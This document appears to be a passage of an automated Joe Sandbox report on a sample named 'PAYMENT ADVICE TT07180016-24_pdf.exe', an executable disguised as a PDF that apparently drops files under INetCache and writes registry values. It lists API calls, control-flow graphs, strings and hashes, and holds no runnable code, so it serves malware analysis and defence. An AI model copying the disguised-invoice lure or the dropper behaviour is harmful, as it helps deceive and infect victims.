                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                    • String ID: "C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                    • API String ID: 606308-3346856300
                                                                                                                                    • Opcode ID: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
                                                                                                                                    • Instruction ID: 3415ad5ee5f1eed3d2c0e447cb4c4d8a0153f3b0974deb3f023f39c7f2583bdf
                                                                                                                                    • Opcode Fuzzy Hash: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
                                                                                                                                    • Instruction Fuzzy Hash: A361CA706406006FD320AF66AD46F2B3A6CEB8474AF40553FF941B22E2DB7D5D41CA2D

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 433 402dee-402e3c GetTickCount GetModuleFileNameW call 405c2a 436 402e48-402e76 call 406055 call 405a55 call 406055 GetFileSize 433->436 437 402e3e-402e43 433->437 445 402f63-402f71 call 402d8a 436->445 446 402e7c 436->446 438 403020-403024 437->438 452 402f73-402f76 445->452 453 402fc6-402fcb 445->453 448 402e81-402e98 446->448 450 402e9a 448->450 451 402e9c-402ea5 call 403242 448->451 450->451 458 402eab-402eb2 451->458 459 402fcd-402fd5 call 402d8a 451->459 456 402f78-402f90 call 403258 call 403242 452->456 457 402f9a-402fc4 GlobalAlloc call 403258 call 403027 452->457 453->438 456->453 480 402f92-402f98 456->480 457->453 484 402fd7-402fe8 457->484 462 402eb4-402ec8 call 405be5 458->462 463 402f2e-402f32 458->463 459->453 471 402f3c-402f42 462->471 482 402eca-402ed1 462->482 470 402f34-402f3b call 402d8a 463->470 463->471 470->471 475 402f51-402f5b 471->475 476 402f44-402f4e call 4064dc 471->476 475->448 483 402f61 475->483 476->475 480->453 480->457 482->471 486 402ed3-402eda 482->486 483->445 487 402ff0-402ff5 484->487 488 402fea 484->488 486->471 489 402edc-402ee3 486->489 490 402ff6-402ffc 487->490 488->487 489->471 491 402ee5-402eec 489->491 490->490 492 402ffe-403019 SetFilePointer call 405be5 490->492 491->471 494 402eee-402f0e 491->494 495 40301e 492->495 494->453 496 402f14-402f18 494->496 495->438 497 402f20-402f28 496->497 498 402f1a-402f1e 496->498 497->471 499 402f2a-402f2c 497->499 498->483 498->497 499->471
                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe,00000400,?,?,00000000,0040353A,?), ref: 00402E1B
                                                                                                                                      • Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                                      • Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe,C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00402E67
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                    • String ID: "C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe"$(*B$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                    • API String ID: 4283519449-1904971246
                                                                                                                                    • Opcode ID: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
                                                                                                                                    • Instruction ID: 7d4f9fc7c678da67c97c1a1890296b71ec8e814f853b941ab64c238268a70fe9
                                                                                                                                    • Opcode Fuzzy Hash: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
                                                                                                                                    • Instruction Fuzzy Hash: AF51F731904205ABDB209F61DE89B9F7BB8EB44394F14403BF904B62C1C7B89D409BAD

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 826 401767-40178c call 402bbf call 405a80 831 401796-4017a8 call 406055 call 405a09 lstrcatW 826->831 832 40178e-401794 call 406055 826->832 838 4017ad-4017ae call 4062e9 831->838 832->838 841 4017b3-4017b7 838->841 842 4017b9-4017c3 call 406398 841->842 843 4017ea-4017ed 841->843 850 4017d5-4017e7 842->850 851 4017c5-4017d3 CompareFileTime 842->851 845 4017f5-401811 call 405c2a 843->845 846 4017ef-4017f0 call 405c05 843->846 853 401813-401816 845->853 854 401885-4018ae call 4051b4 call 403027 845->854 846->845 850->843 851->850 855 401867-401871 call 4051b4 853->855 856 401818-401856 call 406055 * 2 call 406077 call 406055 call 40579a 853->856 868 4018b0-4018b4 854->868 869 4018b6-4018c2 SetFileTime 854->869 866 40187a-401880 855->866 856->841 889 40185c-40185d 856->889 870 402a55 866->870 868->869 872 4018c8-4018d3 CloseHandle 868->872 869->872 876 402a57-402a5b 870->876 874 4018d9-4018dc 872->874 875 402a4c-402a4f 872->875 878 4018f1-4018f4 call 406077 874->878 879 4018de-4018ef call 406077 lstrcatW 874->879 875->870 883 4018f9-40228d call 40579a 878->883 879->883 883->876 889->866 891 40185f-401860 889->891 891->855
                                                                                                                                    APIs
                                                                                                                                    • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,?,?,00000031), ref: 004017A8
                                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,?,?,00000031), ref: 004017CD
                                                                                                                                      • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                                      • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                      • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                      • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,74DF23A0), ref: 0040520F
                                                                                                                                      • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Temp\nsxC748.tmp$C:\Users\user\AppData\Local\Temp\nsxC748.tmp\System.dll$Call
                                                                                                                                    • API String ID: 1941528284-2625437951
                                                                                                                                    • Opcode ID: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
                                                                                                                                    • Instruction ID: 02e4f6238df89927c362e8fae2a75ca1a565c16d749b69ec27d3a85cbadddcd8
                                                                                                                                    • Opcode Fuzzy Hash: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
                                                                                                                                    • Instruction Fuzzy Hash: 0941B631900515BACF11BFB5CC45EAF7679EF05328B24423BF522B10E1DB3C86519A6D

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 892 403027-40303e 893 403040 892->893 894 403047-403050 892->894 893->894 895 403052 894->895 896 403059-40305e 894->896 895->896 897 403060-403069 call 403258 896->897 898 40306e-40307b call 403242 896->898 897->898 902 403230 898->902 903 403081-403085 898->903 904 403232-403233 902->904 905 4031db-4031dd 903->905 906 40308b-4030d4 GetTickCount 903->906 909 40323b-40323f 904->909 907 40321d-403220 905->907 908 4031df-4031e2 905->908 910 403238 906->910 911 4030da-4030e2 906->911 912 403222 907->912 913 403225-40322e call 403242 907->913 908->910 914 4031e4 908->914 910->909 915 4030e4 911->915 916 4030e7-4030f5 call 403242 911->916 912->913 913->902 925 403235 913->925 918 4031e7-4031ed 914->918 915->916 916->902 924 4030fb-403104 916->924 921 4031f1-4031ff call 403242 918->921 922 4031ef 918->922 921->902 930 403201-40320d call 405cdc 921->930 922->921 927 40310a-40312a call 40654a 924->927 925->910 934 403130-403143 GetTickCount 927->934 935 4031d3-4031d5 927->935 936 4031d7-4031d9 930->936 937 40320f-403219 930->937 938 403145-40314d 934->938 939 40318e-403190 934->939 935->904 936->904 937->918 940 40321b 937->940 941 403155-40318b MulDiv wsprintfW call 4051b4 938->941 942 40314f-403153 938->942 943 403192-403196 939->943 944 4031c7-4031cb 939->944 940->910 941->939 942->939 942->941 947 403198-40319f call 405cdc 943->947 948 4031ad-4031b8 943->948 944->911 945 4031d1 944->945 945->910 953 4031a4-4031a6 947->953 949 4031bb-4031bf 948->949 949->927 952 4031c5 949->952 952->910 953->936 954 4031a8-4031ab 953->954 954->949
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CountTick$wsprintf
                                                                                                                                    • String ID: jA$ jA$... %d%%
                                                                                                                                    • API String ID: 551687249-2167919867
                                                                                                                                    • Opcode ID: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
                                                                                                                                    • Instruction ID: 9abceb1f43df10d1a821086e1d45a58eca4464abfa5f2a46825b956852eb5d51
                                                                                                                                    • Opcode Fuzzy Hash: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
                                                                                                                                    • Instruction Fuzzy Hash: AF517C71901259EBDB10CF65DA44BAE7BB8AF05766F10417FF811B62C0C7789E40CBAA

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 955 4025e5-4025fa call 402ba2 958 402600-402607 955->958 959 402a4c-402a4f 955->959 960 402609 958->960 961 40260c-40260f 958->961 962 402a55-402a5b 959->962 960->961 963 402773-40277b 961->963 964 402615-402624 call 405fb5 961->964 963->959 964->963 968 40262a 964->968 969 402630-402634 968->969 970 4026c9-4026cc 969->970 971 40263a-402655 ReadFile 969->971 972 4026e4-4026f4 call 405cad 970->972 973 4026ce-4026d1 970->973 971->963 974 40265b-402660 971->974 972->963 984 4026f6 972->984 973->972 975 4026d3-4026de call 405d0b 973->975 974->963 977 402666-402674 974->977 975->963 975->972 980 40267a-40268c MultiByteToWideChar 977->980 981 40272f-40273b call 405f9c 977->981 980->984 985 40268e-402691 980->985 981->962 988 4026f9-4026fc 984->988 986 402693-40269e 985->986 986->988 989 4026a0-4026c5 SetFilePointer MultiByteToWideChar 986->989 988->981 990 4026fe-402703 988->990 989->986 991 4026c7 989->991 992 402740-402744 990->992 993 402705-40270a 990->993 991->984 994 402761-40276d SetFilePointer 992->994 995 402746-40274a 992->995 993->992 996 40270c-40271f 993->996 994->963 998 402752-40275f 995->998 999 40274c-402750 995->999 996->963 997 402721-402727 996->997 997->969 1000 40272d 997->1000 998->963 999->994 999->998 1000->963
                                                                                                                                    APIs
                                                                                                                                    • ReadFile.KERNELBASE(?,?,?,?), ref: 0040264D
                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                                                                                    • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                                                                                      • Part of subcall function 00405D0B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D21
                                                                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                    • String ID: 9
                                                                                                                                    • API String ID: 163830602-2366072709
                                                                                                                                    • Opcode ID: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                                                    • Instruction ID: c11c119823ef092d14edb4d445d1eebecf1e4ba29e3308019af08aa6c5ad61e3
                                                                                                                                    • Opcode Fuzzy Hash: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                                                    • Instruction Fuzzy Hash: 43510874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99D42DB69

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1001 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 1008 4023c7-4023cf 1001->1008 1009 402a4c-402a5b 1001->1009 1010 4023d1-4023de call 402bbf lstrlenW 1008->1010 1011 4023e2-4023e5 1008->1011 1010->1011 1014 4023f5-4023f8 1011->1014 1015 4023e7-4023f4 call 402ba2 1011->1015 1019 402409-40241d RegSetValueExW 1014->1019 1020 4023fa-402404 call 403027 1014->1020 1015->1014 1023 402422-4024fc RegCloseKey 1019->1023 1024 40241f 1019->1024 1020->1019 1023->1009 1026 40281e-402825 1023->1026 1024->1023 1026->1009
                                                                                                                                    APIs
                                                                                                                                    • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsxC748.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                                                    • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsxC748.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsxC748.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseCreateValuelstrlen
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsxC748.tmp
                                                                                                                                    • API String ID: 1356686001-3611377181
                                                                                                                                    • Opcode ID: 16ccbc1a4839035df8dee6c69b1955b51d84c24cc9eb413e0f302de5cc057626
                                                                                                                                    • Instruction ID: e0a93677b1043ce4e8fea40acd1fa81b7363c56b112b112c42ce1ea238d19e9d
                                                                                                                                    • Opcode Fuzzy Hash: 16ccbc1a4839035df8dee6c69b1955b51d84c24cc9eb413e0f302de5cc057626
                                                                                                                                    • Instruction Fuzzy Hash: 87118E71A00108BFEB10AFA5DE89EAEB67DEB44358F11403AF904B61D1D7B85E409668

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1027 405683-4056ce CreateDirectoryW 1028 4056d0-4056d2 1027->1028 1029 4056d4-4056e1 GetLastError 1027->1029 1030 4056fb-4056fd 1028->1030 1029->1030 1031 4056e3-4056f7 SetFileSecurityW 1029->1031 1031->1028 1032 4056f9 GetLastError 1031->1032 1032->1030
                                                                                                                                    APIs
                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6
                                                                                                                                    • GetLastError.KERNEL32 ref: 004056DA
                                                                                                                                    • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EF
                                                                                                                                    • GetLastError.KERNEL32 ref: 004056F9
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004056A9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                    • API String ID: 3449924974-3081826266
                                                                                                                                    • Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                                                    • Instruction ID: b9d54522e8c2a6a11acfe34e4faeeda892d25e5cd719c7a25251d408d6c76708
                                                                                                                                    • Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                                                    • Instruction Fuzzy Hash: C8011A71D00619DBDF009FA0CA487EFBBB8EF14315F50443AD549B6190E7799604CFA9

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1033 10001759-10001795 call 10001b18 1037 100018a6-100018a8 1033->1037 1038 1000179b-1000179f 1033->1038 1039 100017a1-100017a7 call 10002286 1038->1039 1040 100017a8-100017b5 call 100022d0 1038->1040 1039->1040 1045 100017e5-100017ec 1040->1045 1046 100017b7-100017bc 1040->1046 1049 1000180c-10001810 1045->1049 1050 100017ee-1000180a call 100024a9 call 100015b4 call 10001272 GlobalFree 1045->1050 1047 100017d7-100017da 1046->1047 1048 100017be-100017bf 1046->1048 1047->1045 1056 100017dc-100017dd call 10002b5f 1047->1056 1052 100017c1-100017c2 1048->1052 1053 100017c7-100017c8 call 100028a4 1048->1053 1054 10001812-1000184c call 100015b4 call 100024a9 1049->1054 1055 1000184e-10001854 call 100024a9 1049->1055 1074 10001855-10001859 1050->1074 1058 100017c4-100017c5 1052->1058 1059 100017cf-100017d5 call 10002645 1052->1059 1065 100017cd 1053->1065 1054->1074 1055->1074 1068 100017e2 1056->1068 1058->1045 1058->1053 1073 100017e4 1059->1073 1065->1068 1068->1073 1073->1045 1075 10001896-1000189d 1074->1075 1076 1000185b-10001869 call 1000246c 1074->1076 1075->1037 1081 1000189f-100018a0 GlobalFree 1075->1081 1083 10001881-10001888 1076->1083 1084 1000186b-1000186e 1076->1084 1081->1037 1083->1075 1086 1000188a-10001895 call 1000153d 1083->1086 1084->1083 1085 10001870-10001878 1084->1085 1085->1083 1087 1000187a-1000187b FreeLibrary 1085->1087 1086->1075 1087->1083
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                                      • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                                      • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                                                                      • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                                                                                                      • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                                                                                                      • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2036183059.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2036170525.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2036195897.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2036208769.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1791698881-3916222277
                                                                                                                                    • Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                                                    • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
